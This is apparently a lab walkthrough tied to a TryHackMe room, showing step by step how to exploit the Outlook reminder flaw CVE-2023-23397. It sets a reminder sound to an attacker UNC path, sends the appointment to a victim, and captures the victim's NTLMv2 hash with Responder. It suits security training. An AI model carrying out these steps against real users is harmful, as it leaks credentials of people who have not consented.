Outlook Reminder Privilege Escalation
The Outlook’s Reminder method is vulnerable to privilege escalation by abusing the UNC (Universal Naming Convention) file path of the reminder sound. CVE-2023-23397.
- [outlookntlmleak](https://tryhackme.com/room/outlookntlmleak)
Exploitation
To carry out this attack, the OutlookSpy is required. So please install it before proceeding.
1. Start Responder
First off, start responder in our local machine to capture NetNTLM authentication.
2. Modify Reminder Settings using OutlookSpy
- In Outlook, select Home tab and click New Items then choose Appointment in drawer menu.
- In new Appointment window, select OutlookSpy tab then click CurrentItem. The AppointmentItem window will open.
-
In AppointmentItem window, click Script tab and input the following value.
Replace “10.0.0.1” with your local server ip.
AppointmentItem.ReminderOverrideDefault = true AppointmentItem.ReminderPlaySound = true AppointmentItem.ReminderSoundFile ="\\10.0.0.1\test.wav"
After that, click Run button to apply the new properties.
To confirm if the properties applied, click Properties tab and choose the following items in left pane.
- ReminderOverrideDefault
- ReminderPlaySound
- ReminderSoundFile
Close the AppointmentItem window.
3. Attach New Appointment
- Click Appointment tab and click Reminder in the Options section. Then set 0 minutes.
- Fill the Subject, Location and Message with arbitrary values.
- To send the appointment to the victim address, click Forward in Actions section in Appointment tab. Then enter the victim email address as a destination. Now click Send button.
4. Capture the Victim’s NTLMv2 Hash with Responder
- Because we set the reminder with 0 minutes, we should see the reminder popup immediately after saving.
- In our terminal, responder, that we’ve launched, captured the NTLMv2 hash.